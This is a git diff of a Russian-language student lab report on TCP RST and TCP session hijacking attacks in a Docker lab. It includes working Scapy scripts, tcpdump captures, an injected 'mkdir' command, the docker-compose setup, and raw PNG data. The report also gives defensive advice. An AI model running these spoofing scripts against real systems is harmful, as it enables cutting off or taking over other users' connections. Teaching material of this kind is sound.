character is '^]'. +Ubuntu 20.04.1 LTS +f781be235ebf login: root +Password: +Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 6.6.9-amd64 x86_64) + + * Documentation: https://help.ubuntu.com + * Management: https://landscape.canonical.com + * Support: https://ubuntu.com/advantage + +This system has been minimized by removing packages and content that are +not required on a system that users do not log into. + +To restore this content, you can run the 'unminimize' command. +Last login: Mon Mar 4 19:45:56 UTC 2024 from HostB.net-1 on pts/1 +root@f781be235ebf:~# + +``` + +"Слушаем" трафик с помощью `tcpdump` +```bash +┌──(marker㉿kali)-[~] +└─$ sudo tcpdump -i br-932aa0b67a23 port 23 -S + +14:50:10.308304 IP 10.3.0.4.telnet > 10.3.0.3.55418: Flags [P.], seq 825594434:825594502, ack 3707590235, win 249, options [nop,nop,TS val 1822356222 ecr 1858411726], length 68 +14:50:10.308324 IP 10.3.0.3.55418 > 10.3.0.4.telnet: Flags [.], ack 825594502, win 249, options [nop,nop,TS val 1858411726 ecr 1822356222], length 0 +14:50:10.315817 IP 10.3.0.4.telnet > 10.3.0.3.55418: Flags [P.], seq 825594502:825594523, ack 3707590235, win 249, options [nop,nop,TS val 1822356230 ecr 1858411726], length 21 +14:50:10.315850 IP 10.3.0.3.55418 > 10.3.0.4.telnet: Flags [.], ack 825594523, win 249, options [nop,nop,TS val 1858411734 ecr 1822356230], length 0 +``` + +В логах трафика нам необходимо получить данные для наполнения скрипта -- `src`, `dst`, `sport`, `dport` и `seq`. +| **Параметр** | **Значение** | **Примечание** | +| --- | --- | --- | +| src | 10.3.0.3 | IP-адрес `HostB` | +| dst | 10.3.0.4 | IP-адрес `Victim` | +| sport | 55418 | Номер порта, с которого `HostB` устанавливает подключение | +| dport | 23 | Номер порта telnet на `Victim` | +| seq | 3707590235 | Номер следующей последовательности, который ожидает `Victim` от `HostB` | + +2. Подставим полученные данные в скрипт `opt2.py` для проведения атаки. + +```python +#!/usr/bin/env python3 +from scapy.all import IP,TCP,send,ls +ip = IP(src="10.3.0.3", dst="10.3.0.4") +tcp = TCP(sport=55418, dport=23, flags="R", seq=3707590235) +pkt = ip/tcp +ls(pkt) +send(pkt, verbose=0) +``` +3. Выполним атакующий скрипт + +```bash +┌──(marker㉿kali)-[~] +└─$ docker exec -it Victim ./volume/opt2.py +version : BitField (4 bits) = 4 (4) +ihl : BitField (4 bits) = None (None) +tos : XByteField = 0 (0) +len : ShortField = None (None) +id : ShortField = 1 (1) +flags : FlagsField (3 bits) = () +frag : BitField (13 bits) = 0 (0) +ttl : ByteField = 64 (64) +proto : ByteEnumField = 6 (0) +chksum : XShortField = None (None) +src : SourceIPField = '10.3.0.3' (None) +dst : DestIPField = '10.3.0.4' (None) +options : PacketListField = [] ([]) +-- +sport : ShortEnumField = 55418 (20) +dport : ShortEnumField = 23 (80) +seq : IntField = 3707590235 (0) +ack : IntField = 0 (0) +dataofs : BitField (4 bits) = None (None) +reserved : BitField (3 bits) = 0 (0) +flags : FlagsField (9 bits) = () +window : ShortField = 8192 (8192) +chksum : XShortField = None (None) +urgptr : ShortField = 0 (0) +options : TCPOptionsField = [] (b'') +``` +4. Убедимся в наличии RST-пакета в `tcpdump` +``` +14:52:18.312274 IP 10.3.0.3.55418 > 10.3.0.4.telnet: Flags [R], seq 3707590235, win 8192, length 0 +``` +5. Проверим состояние соединения путём нажатия Enter в подключении `telnet` +``` +root@f781be235ebf:~# Connection closed by foreign host. +``` + +Согласно выводу, соединение было закрыто, атаку можно считать успешной. + +### Итог задачи 2. +TCP RST (Reset) атака - это форма атаки на уровне TCP, которая может быть использована для нарушения установленных TCP-соединений между клиентом и сервером. + +Принцип работы атаки заключается в отправке поддельных RST-пакетов (пакетов сброса соединения) от имени одной из сторон (обычно от сервера) для преждевременного завершения установленного TCP-соединения. Это может привести к разрыву соединения и прекращению обмена данными между клиентом и сервером. + +Несмотря на вышеописанное, подготовка к такой атаке является довольно сложной на практике, ведь злоумышленник должен иметь доступ к трафику внутри сети для правильного составления атакующего пакета. + + + +## Задача 3. TCP Session Hijacking attack + +1. Аналогично заданию 2 установим Тelnet-сессию между узлами `HostB` и `Victim` и соберем исходные данные. Скелет кода похож на тот, который указан в задании 2, отличается лишь сегментом TCP и необходимостью добавления блока данных. + +Основываясь на данных из `tcpdump` заполним нашу таблицу: +``` +... +15:44:49.999520 IP 10.3.0.4.telnet > 10.3.0.3.60124: Flags [P.], seq 482847749:482847772, ack 1386786213, win 249, options [nop,nop,TS val 1825635913 ecr 1861691417], length 23 +15:44:49.999547 IP 10.3.0.3.60124 > 10.3.0.4.telnet: Flags [.], ack 482847772, win 249, options [nop,nop,TS val 1861691417 ecr 1825635913], length 0 +``` +Таблица: +| **Параметр** | **Значение** | **Примечание** | +| --- | --- | --- | +| src | 10.3.0.3 | IP-адрес `HostB` | +| dst | 10.3.0.4 | IP-адрес `Victim` | +| sport | 60124 | Номер порта, с которого `HostB` устанавливает подключение | +| dport | 23 | Номер порта telnet на `Victim` | +| seq | 1386786213 | Номер следующей последовательности, который ожидает `Victim` от `HostB` | +| ack | 482847772 | | + +2. Заполняем скрипт полученными данными +```python +#!/usr/bin/env python3 +from scapy.all import IP,TCP,send,ls +ip = IP(src="10.3.0.3", dst="10.3.0.4") +tcp = TCP(sport=60124, dport=23, flags="PA", seq=1386786213, ack=482847772) +data = "\r mkdir 1337 \r" +pkt = ip/tcp/data +ls(pkt) +send(pkt, verbose=0) + +``` + +3. Выполним атакующий скрипт +```bash +┌──(marker㉿kali)-[~] +└─$ docker exec -it seed-attacker ./volume/opt3.py +version : BitField (4 bits) = 4 (4) +ihl : BitField (4 bits) = None (None) +tos : XByteField = 0 (0) +len : ShortField = None (None) +id : ShortField = 1 (1) +flags : FlagsField (3 bits) = () +frag : BitField (13 bits) = 0 (0) +ttl : ByteField = 64 (64) +proto : ByteEnumField = 6 (0) +chksum : XShortField = None (None) +src : SourceIPField = '10.3.0.3' (None) +dst : DestIPField = '10.3.0.4' (None) +options : PacketListField = [] ([]) +-- +sport : ShortEnumField = 60124 (20) +dport : ShortEnumField = 23 (80) +seq : IntField = 1386786213 (0) +ack : IntField = 482847772 (0) +dataofs : BitField (4 bits) = None (None) +reserved : BitField (3 bits) = 0 (0) +flags : FlagsField (9 bits) = () +window : ShortField = 8192 (8192) +chksum : XShortField = None (None) +urgptr : ShortField = 0 (0) +options : TCPOptionsField = [] (b'') +-- +load : StrField = b'\r mkdir 1337 \r' (b'') +``` + +4. Убедимся в наличии пакетов в tcpdump. +``` +15:45:40.024448 IP 10.3.0.3.60124 > 10.3.0.4.telnet: Flags [P.], seq 1386786213:1386786227, ack 482847772, win 8192, length 14 +15:45:40.024851 IP 10.3.0.4.telnet > 10.3.0.3.60124: Flags [P.], seq 482847772:482847795, ack 1386786227, win 249, options [nop,nop,TS val 1825685939 ecr 1861691417], length 23 +15:45:40.231905 IP 10.3.0.4.telnet > 10.3.0.3.60124: Flags [P.], seq 482847795:482847830, ack 1386786227, win 249, options [nop,nop,TS val 1825686146 ecr 1861691417], length 35 +``` +5. Проверив состояние нашего соединения между хостами `HostB` и `Victim` обнаруживаем, что соединение зависло и не реагирует на команды. Но как обстоят дела с папкой `1337` на хосте `Victim`? +```bash +┌──(marker㉿kali)-[~] +└─$ docker exec -it Victim ls -la /root +total 32 +drwx------ 1 root root 4096 Mar 4 20:45 . +drwxr-xr-x 1 root root 4096 Mar 4 19:35 .. +-rw------- 1 root root 40 Mar 4 20:48 .bash_history +-rw-rw-r-- 1 root root 160 Nov 26 2020 .bashrc +drwxr-xr-x 1 root root 4096 Mar 4 19:36 .cache +-rw-r--r-- 1 root root 161 Dec 5 2019 .profile +drwxr-xr-x 2 root root 4096 Mar 4 20:45 1337 +``` + +Видим свежесозданную папку с именем `1337`, сигнализирующую о том, что атака прошла **успешно**! + +### Итог задачи 3. +TCP Session Hijacking (взятие сессии) - это форма атаки на уровне TCP, направленная на захват установленной сессии между клиентом и сервером с целью несанкционированного доступа к данным или выполнения действий от имени атакуемого пользователя. + +Принцип работы атаки заключается во вмешательстве в установленное TCP-соединение между клиентом и сервером путем введения поддельных TCP-пакетов или захвата существующих пакетов для манипуляции сессией. Атакующий может попытаться взять контроль над сессией, изменить данные, выполнить команды от имени пользователя или даже завершить сессию. + +В целом атака очень похожа на TCP RST-атаку по необходимым вводным данным. + +Для защиты от подобных атак могут применяться различные меры, такие как: +- Использование шифрования и цифровой подписи для защиты конфиденциальности и целостности данных во время передачи. (Например, использование SSHv2 вместо Telnet) +- Мониторинг сетевого трафика с целью обнаружения подозрительной активности или аномалий. (Сетевые снифферы с IDS, например PT Network Attack Discovery или Kaspersky Anti-Targetted Attack) +- Настройка сетевой защиты, включая файерволы, средства обнаружения вторжений и фильтрацию пакетов. + +# Итог лабораторной работы +На этом лабораторная работа окончена, файл отчет в формате pdf во вложении. + +Выполнил: Харитонов Марат Русланович, студенческий билет №М235314. diff --git a/pentest/01-network/01-tcpip/02-tcp/docker-compose.yaml b/pentest/01-network/01-tcpip/02-tcp/docker-compose.yaml new file mode 100644 index 0000000..85c9685 --- /dev/null +++ b/pentest/01-network/01-tcpip/02-tcp/docker-compose.yaml @@ -0,0 +1,57 @@ +version: "3" + +networks: + net-1: + name: net-1 + ipam: + config: + - subnet: 10.3.0.0/24 + +services: + attacker: + image: sb27/sf-lab1:latest + container_name: seed-attacker + tty: true + cap_add: + - ALL + privileged: true + volumes: + - ./volume:/volume + networks: + net-1: + ipv4_address: 10.3.0.37 + + User1: + image: sb27/sf-lab1:latest + container_name: HostA + tty: true + cap_add: + - ALL + networks: + net-1: + ipv4_address: 10.3.0.2 + + + User2: + image: sb27/sf-lab1:latest + container_name: HostB + tty: true + cap_add: + - ALL + networks: + net-1: + ipv4_address: 10.3.0.3 + + + Victim: + image: sb27/sf-lab1:latest + container_name: Victim + tty: true + cap_add: + - ALL + privileged: true + sysctls: + - net.ipv4.tcp_syncookies=1 + networks: + net-1: + ipv4_address: 10.3.0.4 \ No newline at end of file diff --git a/pentest/01-network/01-tcpip/02-tcp/img/image01.png b/pentest/01-network/01-tcpip/02-tcp/img/image01.png new file mode 100644 index 0000000000000000000000000000000000000000..d11c45b9f750365e5b346fa53bf59aebad297ded GIT binary patch literal 49025 zcmeFYWmuGNyFRL-gdp81-HkA`G)PI;00L4<4c!=Yhe!<|B@GhNAujnO~>!GV6f2RsTy8(Q-Z!f1Qcjrz`0`8^N1K=}`o2rS&ojVjnx8HaB z+0e3g?sSr?Daz^lT5PpH2-Kf!ISE-nUsvaFquNi_rBTPK=5Owil{|mQJN8lDu?A@v zP4091g^lx;kX11fmr(4napKcAgxbM3sA=K1Pa{NZ!(aAYcI3*?3Dw!pZrN8K%?DI| z4Y@0i%@|5}`$LL6TKHf8CDg?ywg0aNg|r-qf8HRJR~3H_#rfAuiSD03B>(l&>Qe~Y zf4$WI7OC-HlYYQ}XZ)QV_`!+wp9TIUi~o;Aw1UGaXSF6?*sH=MCG=2di4pseOjHWH zIx}S+kxpc6G^|uO3gpAh(9F74Erb5>33Nj)L|g#jVxe7vII6bh#I!M?dy7^q6qKKd zFui+esmRW_nyF#q$nar>QFim5?y%xx5thCwA334L$VkdU@Q?4?)@aWJ_uYqltV)dF zH3n~q2aXwMeIZ*id~#~XwqT7&MdRn#-w}n#xuHPPbXi{YV1)D>qA7Hff;h=nf|iky zDDqj`n*pDgy>+%sj;B`Fbl^@1fw*6SnF(NOE7M`OrUe}9n`ZTN`uL84)XgQ@_d1MX z9~r~HRFpQjpMQDvu8lwUm*WhBUQjg>YP;!=$tjO8klmu4x@XyTde7p#UQ(huM&*DP z-TUnN33x9(BEwu(ao)&6ZiryEV4RlVG<#TB`+0c2NMV4M;&8$%s*C-iG%tpZ@U%sT zsE*g#kAHqQO7tKqZKUzIyUR;-^Zs78?z;6ro3(A?%2xPaY{&M^h?_xQSz}jT7!#} z@p_IYgRaEDk$?Slnnd}JP>DcMVfz`e#B*skn)l#5N8)wGZvPqr+r`Jd~%{FnO= z+Qb}aj#=%P%cASNEW{noDte@T$ zDu0b@(dlR`Q~$`6CsO{D3?1Op?e@ydHShppd1&eNOoX~GZZ;|`cTz59m*R!3bH_)^V<(SVU`ZGc-Kp3RBkUky5RrHOb`nC9(1crfrr4Ug53X!j&VJcY#=| z8}v8M)H8sC{T<@EZZ|imA913fnAA5-G*~4QG(RXU>JIU~bXy^|Y0C z^{zeoGkVj*obY{m@t%MpQYGhaJ32#qS~v4kM2@eXnfvbCpNsg_jS5xCyOc3Q+pPdozZRnX?@7jgEoi5j9?;u2iXmY+`J7>*-$&u z{FO3UDT*WIw9l@~Lq--oxVu3S9o+W_LwNC%F4$}oV;Y~M;v`BI^BI)4ao&!v`K6!1 z(Z0(?6fZ4`M(?Sqy;Uw)e9f@WX_sc%7(3<4UM#oQywn*o#jc+n8@JPluceZfDn%m zQES>&p^Q%6B!M%wOyOITvvWSrlUHMg$_cC+)p>SEDUcRgjM1LQXN=ej;^dY=f^_9` z$yT~YS$*y6QM|8@t&c{k(j~sIQfuwKQz5<;z3S2X+jtM-a-p}3{nb7|gc7|Hs`?n$Qw%S@O|M3*4GEb#swyUs5cRAy>N`<;&>mk-~25 z!mzy(LnRzgZMPU{ERFrQKuV-nx zd$b14cKX>;!DTB@WBv5O!p0Z+h!lh0E{|FHFzK^IyMivUd^;^{+D^7#@_<3)BrTmW zsOu5hBWmrgB>`91OH3Q*YKwGHdtvY5ImMqk6fBk!u}@OY^UdRW)+K_e*$`&o23T55 zD}ijae7WDc918@3M(@&!-=JY}HuMCmsBq1d2`_Rm`5>`uq=_<=nW(Owj5Vha=_#l2U}Y;N`zW&7LxgXFQxkvvTE(_;v? zcLI@PE>UdCq~;AL9yP4v2KT=e@>Ll2S|D=uVSF2A$B)HJh($o|JV|2r3=w!`|pI_G~+e}mM~x* zZiN|g>$I&E!1W%?rmK$j|{X1hYnW10Ud)hvVX)XVJw|3gL3BsGp-dEMzeqcOZCqo_U4bQue zW~W+;OrOQmY#silh|*I{K!2NI@g)OWZ zbn;UH8OSY$<*06&Z#fyi?)4bgNZoab&80Vw)3RXar1i^*2H!(%zb@B;zU?rLmv#YG z7llMjh*qNXV4O7bbDO7)E)F#y`m}-A5CiBM&LpF29t5>d*>NR;Bu-9DherRbA87KI zBnZn-5}(w1;T+*jDfEgA`YYp6eoe^Xox@i`_th`&5fOeNEyxOar=1zs9lmmJ-FHk@ z>EovH;4eu8ZozJhhgv>KeC)-2S1;38@f?ZI4Ueri#j5Vk98$+5xrp1Y=yN{R(ZSzY zr6vd!;%KIf?7murq2_yRpgz|MOknp{+{bYaJozo;A_bk}<~*N<+_7el&kt}A)Z`A@p2 z&N_;&r~l?v?0@nq_yigewm1P-Q6R7maVmY3_KAZVThc!$bRst-BC6}#&^!4RTDr)t zN}8qlV65K|x#FSTA`E7Mo$~Ng&rAj_i{bC^7us9qyYJEAUS~Fw^^o3wCsoLoWJE)y} z0d^9q2&3Q6pWnd`!|bx}#dI=jq<$^t1go`L{G{-Ha!-D|>(pu{*jEV(SI}l-29%Qn z`RgP(gh`{J%u`R+>3&{a$^N#qbcjcAcM~!%7zK*a)tChoEDzj7-<%J3esam>og(wW z^5GBYb~I%dx%nbKb4(Rpqo-2f+FCu@G4Om4O-Lo#cAuoRzN?qPr+cr)Mli@-QY5Gx zKPRM!Cfwyf1^ECdVWw~^7lJ9`W{ZwbRULLlwc_bYpLh^#V^VJnC<(?y(J7 zMv=8%68SIjMeh_owhQ17yqaA6&Cma}_atE4jq`$>4@=|wCm+l2=n#K~%J8^vk)zq8 zWoi_jGYqlosV+wV#eoHMVKxomfnq86S;qeV0vjyrvKWUr}iF5S87p&N0DXs$n# zkjc<62mP)Ora5NNhJ^)`s(R2Q@Z~lr zqN^`#whogh&&?(4Pmuw!^VHGfCoV|4ckK8Tv*8%*#7P$J4~*VVT0bk--akvr9t{{I zSYQ15Br{m>US0OGo1y->X{_XNjH&QT+6?|a%7ROSw2W9Ei?PG(P@0!-&u;5N= zNGtuWU1jcz_YXmqh5oRmp=n1|&&=q&T)>eQ59LovJp`OzPGGX- z+gRI(1S}JrRs(4O`P&2x#mEA#NXu?whOyv_Pl2bDK^9+pCF^7{l>|Z`3*}MNPhNexPJ1sna3jGt(CAJA{t_@K=5S@@{Il#zMrKEZ1UFup@kuwv zYyY5kCm|QK7XHhR+V;;keXqRyD))&ke6Ka7CLPEdLd{{>-0Z(43Ycet^o=?e35P8>c(y*TWy}6zGG>Dml*{4 zwdf?W5NxwvFPPD8dz9E>MMT0ZKD@-42xNct;_;>OxBrfKM!!{2BegQk&M(RO*~6Nf z0$9mVdaG9-UKSRbKkb>9PYEPP{a!digVIP7nwk_@itUkhE}{oJ_g@^XJEn_T315<| z)=e41U_H!?qXaG&AFZBNles;VN|0Y+K3P*LEM|FZ(HXKNA*8@|TzM;0r0sE9hC^Ry33It>A6PesWT0n4~ zJ*;(G4x~n8p>7;P=9BXSGf*bbv~6{*q-_l?<$RZzeW_Q%%^6J)#_4n)`9G}SW<3Y` z?AALEe5#Swf5c7FBzuIjV{mIBC{qap>t+M{`l$Y20s#0d&=Ta-S=5j3>A^Yd%dMV!1?~(&1AqJllCO3x7;a@A9z$bHehr1DO z&ER)iV{tr#%Exh@g+Cft*QE=pBHX#2g0G$uWD zY8F8G`5ouoQl&K*4|Skf_jd~zv7=5QyHj&nrF$~J-#4vr%f1rQtYDUvew4;<@!cTF zYR3%FBuwZpVDx@U^elQ8c^)_0*YEGE=uq^SpCH4iddWfyU***;>8e_!@c%3Fbtwwg zTvCGF+}zxUK-htvue;`?r9}js?3i3ayI$x^i6n^R`tsQdl*xz?WW?Yp9}!I0(h0k} zyFY*a{7rH)aovy%l{O2atE-Dr)QOT>%w^E+(<#6Yj+7a22Oj)jCzrJspd?Gsmc9Df z$3DcZo-0fl+aJTS$eu(EPI91dAZ6Tml9tzOogWmR|q@1xy-$JFMD$~{CA;Liks`*n|RBs zKSmC-4VCcQw~iuZFP8{TJ8w>Is44n+f)FJ+f(|2(n_60sJM*o#3r+QA=%+ITpWgM_ zoKR9$4nL!l?@Mvt7-RieWlp0IjwjfufL+Q}Pdwk|=RrzAk+lfGTb1+U?HHd0KP)kq zIe|_ERd^mK1mQs;xYhfSYx@zoaxA44@C#jodYAbb2TdjH(gi$P z5aH40WbgKD`?+0 zy3#JF^J1s9$^WPf*d!M|JVT!n;Q1SX%02Q52t_bKfWCVD3D^o?r7&-xe^A2!KnxHj zslD|hQhQx1;KLL?Fyi>ORnYqesZjxtd|Y_IhgmsbL@+QMN%e)VHU)-2xpj zV(XS#jlT=eFa}os&!+z)>HnC=e;n~Y(c?dH`aj9#KN<1gV-K^$?39G@D5^b)jE6>x zimljb%Qzr+CL+dS{@*>7wCGG3a{ytKadPm;Bd2LV^zIX&Yu;65+g>Z2wB@KhT-gY9 zs>Y$$=Z63^`=gjJNhPyHXrq~@dKwBKF= zC}Mi^YSjL~%9GZMa4}xWq0P{w??4i7F#&O~TNBgnrq4wtR=Yz*7FUb|KpIx@<_D4S zo$pp96$DVo zn{Jap@pnXq%eqw04?cJE$-JvbjCFogt|k_9Qs6b_0dCCT>#M{6f$S!TDO2M)xr6qv zK6Eo7_}0aKJ-8~St2!7tS{I(CYG)U>xzu&_g=!@A_l)y?<3tp4MX9&PpJi$H?}yx9 z`~j&J9~qW+(f3~WKg>qHvmk*A26jju(@VY|tSDZ57>d*=<3{n>TdnRq$IJBl$+5h} zHp%+TBWTY_%*j0(w))!V|GA&q+3i?}y*lpBs#%cRp2K7OR;=%<#=qcJ2~R<-*|6~W z4oXoJc1x^yq=D{_rhwfI!%w%n5-0M;Z)b1$)O)Is-a0{Yfsd8$Uh@!La|r%&^@*W} z-&@!na{kJ4xe7fFz{@gj9ULP8hY20#+|QMV-{|c_^m2@Br(auKyO^Yv4$O~wZ864L ztT=*40%raPgnd1Yq>XdM+!en6Yls^gV$T#8DQ@m%RiU6kdWoSR=oN<5K~+oOA$I?_ zw|9o|sM?yW>8I|q902!L0)n+u_^Ydw%pyzDFBki%wSt+yHszfwm0QXZUWzUocE+`yJd>&7l&*^`b>?PGE&Y%E(J98wpMHmOfwI5IAf=PHc0dXGB>QKwI%3u& zW6cM<6!cG-0W+m1wqJZvaHmoKjv0xmZ$wzw@=G_$d++7BN%O3%_Hgl@WY%oZp{6%4 zlOW4{JFDbUseM0q6|Hr-Ui~TyyNiKI9b%S=&|#7+zSDdbrXBQD^x#bd>`e7dQjE3& z^vSzmWj@S^P(~3Eyn%+y9S}j*X1sB!hM9zm6Upbfi%T^BNTHhE%lT&1$XQ8q2}Um& zg)l`qt}Wbe_O7e~I5!;h+Tq%?|Ft?1DebEdlQbu%{VjBgmPDw;aSC4gw1yb@!#}@f zO9pZzLq=-`EPi+e@s@>lQIrFHrQ0eBX4)TJH>pQ#-#)&zOcCq1*(PB1L$KiN>v0|z z|K}efdMif}87d<-ZNlM$-rbj)Z;k7pte3)~=SS0<`fx%n(Tn>_#m-*>jYvN_5qt$X zdnLe$>n6@Wp#)N_kob>aeMgI$A*^KzBPog};RE9NsQdQoziovl z&rPJforu(Z!fC3jfB6&eckaipw99_njy)aqj3>;DIfuRf8qf_XCB}4QN>#9p^zeKc z3h6S`MLV=TgjQry7Uh?rHJRu9}@BeO*7cowpH>jQOV*L*6Yj3 zGy&%`9iBxxTZpMjWHSxM7pDM$#?2fiawHWd`}y zC9Tht`{{|pGXt;fiK2Fv%|}c+3Vd=p=`TI=yE%*k_vigDEA52arb`HB5~N~9yYWq- z4J{E122SEH*x7hbx+-T=(Rj|f;>e02L5z3ug273%SC?axx&2CyhRlYP=tN4kzg&?g z(3vT=E=9yn8Z9`-q%EFNSB6Y6Z!TRHY|t{!5G*ECV{XgeI991j_4a#uB2rbir~b&sJ$ zqc^zQ1tB%unDORsm-NJJW}fkzd@hDNmcRb6u*x8{8Ob>8U(CI!RduGysGZeMZ10?0 z+FAFku3jFl0xvLkfBGw)Q31q5f@fAerap20A5YAxB_6j zQPNuQfuvH8xhMl?A=AI={@0}%5PFFV><&6F>=-dWnyadJ3f+XhLig`_lU~2=!XEju zXX5pUtTcsqrg~0R;J)y)i&Q-*cWOVmefve>kXX=_eBrywX3AIlrzK@0V3C8-@Aki* z9Ey#Af1+(7p$tbvZ|Rh2zX?Qpe9f$$habERAI>ab3nkD>A8mk-F)c zUr@fOy0$m~k%L_O{rBb`LM)oMLDs{HjG}B0M|EZ>xCdqACzRmwDzpu!eor3FTg>nH z+OVMA22GZuCP-1wih)Hc^*(_#40 z=v~YYZ>H9r28`}YFP|rg6|RylxPCqrl8N%4Q&B&&*+BoHENZSo`CVyx(;pOrWEuY} zBIrYBBS8sJAJX%=m7g$&Wkr{P5x?{E2+HB;oyW*Frx*gJ??row--UR20qW7xPG4ue znVF3ZGcPYs+4kA4`;h5&R5d3eRm%h-vqkT)5?7hKnF%Fy?mMkdWrIwteVh5CzzvCt ziXu-SQeF+a#>|Z2(mAKhGnh@#gO)Se!cB6gbC~=}ho3imsMDratI-KhT3z8ks-HtrS`C)ZK1gMM~?tiA6EriGZnpYBUhJIL5}uhhEEz&FJ;_>%u?`lY05>u$V+*cbAPp`D7nK5anTL_|Z>O)gUQ3Ssv1Wp$`qv zbWNx{lz=v7G(+OBsci}d~XKk``Ql$4bfxZ$XRmNQM<;;>*^Q*7NNBsDvx17OO6Yro%CxCd{ z#v()QENf_f^?J%MMB`lR%vqcxBDy7R)i)LCr!uO;wfTRJ`b6y41d7M?LtDLH)$Yg1 z><*^EUOYkmS^X>|_~<#*`4*r885Y*~-8SOoe7v`{w(C;u+V^eJ{q&uq z>j2iVfuSEC-+SHoQ<7M*wh5w?{SlqGw0`h%Dfe95-S-@b;|K6*K@LgKloopk3nhl1 z31S*}#YrO}@4;q!tje$sbQ?Fi4&V;|vX&FNT!?cJ7egl@taqI`iphyuLR)+B_eDZM zK4=yoA}{hPK$3Ki1P+wBJ3hMqQBz>>ASGo&wgCc2cn+m|UyE#8{*#VkiU~~`s6?}$!1sQh2moHl}@X-GfOd4xYOQorYxbgR{M#& zJML{MvakuG{{)f*5a}(S%YnG%X#Z-zd5p8`*Ps*Vg5|~a=cha)Q-NbuHlq`SJkvyP zPh`(9Z_slw0GOc~@K!d3PSDGrY+eq%o$?hR9>t;3H4)qO*IoVh+xtOEO3ui%L;Shw zP$`Qsfc1E3v+J17Ih^hTNgnRP=@;(n%V!FKqxKjQvF-pg`qgW}Jo9KVVrLop<-!3k zI>r%keDB|iJXOQRf-z8jOdzi!`M#GGv>jFxU z(_FmN@7#kWFC2=#@5oQ8Gd&idynZW3un^$cQif-en?me=&xkRLi|nhb3jMd1D?th3hQj|kEDqorKwxq1DOQSoE<24$8HOF5w8 zbiA9TArV*W=ra7uNOqto0I}eqC;j@>mhMc@Ae|P@3j6c^tuB+B)AZhScSKQ23}cX_ z(Z0``R9k*YLPr*Ldg=?64*0l#KPfXadc0VhMt7HiGCGV#YBXq0u40NTde#R$7?7*~ z0kN~dme(}N^(Q{DqjVuT+K>iyz|J4Rr*GRGfX4$c zj?^CDAgW$IgEtSabf?$!V{}}9mgg1}e4Faet){K5qUc*9`0VVUa$#L~gK*9H6KEDF z1pciKO$FzWw5;qk-RZ4}aZuvdZ_hL|6b;EQkfsWypiP@n(VZjsn+-&I<37t6Uo;O8 z{O$o;Q1}~(LV+X%G)&;rK<9=#!%SCj&h7ENcJ}5z9A%gZSG?&9AgL@JZ_lok_NBP( zBb5}D!kIZhq-H0%-w1@w3x(+4z&tWI_&$SXF>K+}z5Mt01$7Rxl%_;Hb8?tg|A}a_ zAIR*B3+^f}IGDV=%?{SX>GT93FCa$K0~)~u3Zz~+S(utd*}7@}G$30k6k}`OOP|RfTcH=KgZ$YnZ4}f;w ztz;6Dl7PCoV0RHh&xMroPokK^(2GUcre1+F6ED=7d8cPDT;ZAPnsA zZM4UtqsoYL1qo0}2^@?~GiGTOo$XCT9vH43wmNyeZ9!C z32fy@GtkD{mvSOQIom<#>!xTdwUC`>yLyS68yX@?8EUsr8tBQK9zY&OM(xeeJa2K)@hpJ4a!9K2(PPrCqOkve~TuHoGU)OnO5Xl%@la$beCQlEOS75`hF3Fs`MmwfcJm#UkJZ^c@XsLW@yC9styh6TyXdCvVq5?*$=N{NCW@hoDcp1Zt=!S z`N+`glLGzXSiKtr>2O=R_wXTy&xG4@&m&k*PoK=Aw3Jgd4O4$SW(wchggUxB|I}661yH|Y=y=J1QJodBDN3upsS;k?7PdvMMu}B+mqqQ^iFsD6I`0NJfO@>OoTKf zHi#o%&WHluHHgx?VMv4PKf;Y7B_(BCIaG?ZSm(srWOSOlcnbYWtOEu+OnJSlHO8!&)Hu zA%$t z=aQV~WhjGonj@BG)xQ#n?GG24zVc@pq?Gp((Xt?&l^tY)gt7)dwHk=71@}I& zM?9cu8+o0KYq)Er=NzyE34$K^jFV$X)V8g?6MbaM@OP%*FF$)tE~H<q?E(AC6q6`xSj+KF0oW3wR6BJ)!z4gZfWCWw>p%=4V~b!9 z^8vFVFW!)^v<)A6$#4Ka2LQyapRddeIc<5zbp4)oN&hnSNJ~Wtx*F=SHt1-$?)=ok zf*z=%fxKu4aS?Np?cqNX&B@g)%ju1(%NhB4uUP(wWeC=f3B>T*awdVq-fZo^1wn#R z@i1@2H|<}J267tU&40mw`x9Xr$@m;WnBOIn7?81|bKH=FSN)M*z$s!x{R@T?uP7UV zdWc_23+fDHrGHMS1?64+nF6fyHz)w>sEc0|0v_>SF`xvrD-wf-vATd($lqX#FTr|y zsS++9Pvl*B@`0P&ETL&mqVo{I1%Q(4-(fJOa1euF6uRQqj&8H8ip7PRirpUCHX-1)of{k7V!rx0%^z^j29I6(dY z?(_Uhi^RF!kH!sieN~|a`AiT|-Z-QavyiZG(LKU5X2>zFEC84>{ykt;Bt}^D#(oVB z2k}p@#4WP}p~7tk_yd)dmGok!2{-iG&;_z02zsF<80GQwr38E$|KFFI#GKrS@`eja zGHf!`;UT(j$Tn=0yabdhL1r6?#xEv0wfYQH+429&U>!(KM-K}EfWe6*(WHi>Iz4p} z=!1hnJ)+mo1to&cKS108ONxZxCRi6n)`bA}OJDK|g6QuTs>Uhh0t6yw5K|{}_pLs! z|Nc89_^R|3L`z#+?DnDOB|~%_0QZfUYB(na9M2#?`g})+rTyEp9_pl}w2XwS_x(jF z6>@M6z|F*yBD&zxgd`LUaO~3ir}uM}v|RH1xO5Ew66e(`uD=5Kzm*({Oe-r#-8^E4 zP&aHz=;ewc2^(3Ap7MkIPoKU?k=2CHHo7v4uHiAQDDDJm!2F_U!Ux5}F>?0%2CZce z%08FDn(M7gd?fiT+WJcJM<$-wBcO5)B^G_amRSv05$vnGdOAz0s;XanV+FYQ0Rpz) zQ~%|Cfa26MKnBk7!oVUzcmEya6{!f#N_MSAT&}>_P zHm4^gtD&mleGZ9FhH{h8w2oH3e>0-5ydu3{*YmO$)KlC!`>;)t@?Y zp(yx+tjDe+pTnuq=@FhpRUFB`j`k?hn?}wVa*Ycc`cv+*_qz^*E6zczx&_T8s9s-j z*{b;sbx2jXegkMzskR1p9^jqv)F7ih5W9`reXgGwhMX9S4{y5Gq7!A|XE=F)db*1F zKAo^oc=B^2inXaUIe=1e2+)6%2MV8<7#a8Q6T0S(hJ_t5$~i)Nx!)_=!{BxgIxxRc zW!KWS2u1-AY4BY}P*=&=$l^Cy0aCdxtGy$FF3+S=*Kl1ZcUC_+>X&Q#HOnXZwYhY%>xOfZ>!lL3SQD%e?BKnQMDTNc*$F(+i z7$+J{A`b{wAKIDaN!iXu`@Krxy2s#?u)P+|F#W`+UDVNBdjN%+T2y3gY+}l>+8}t< 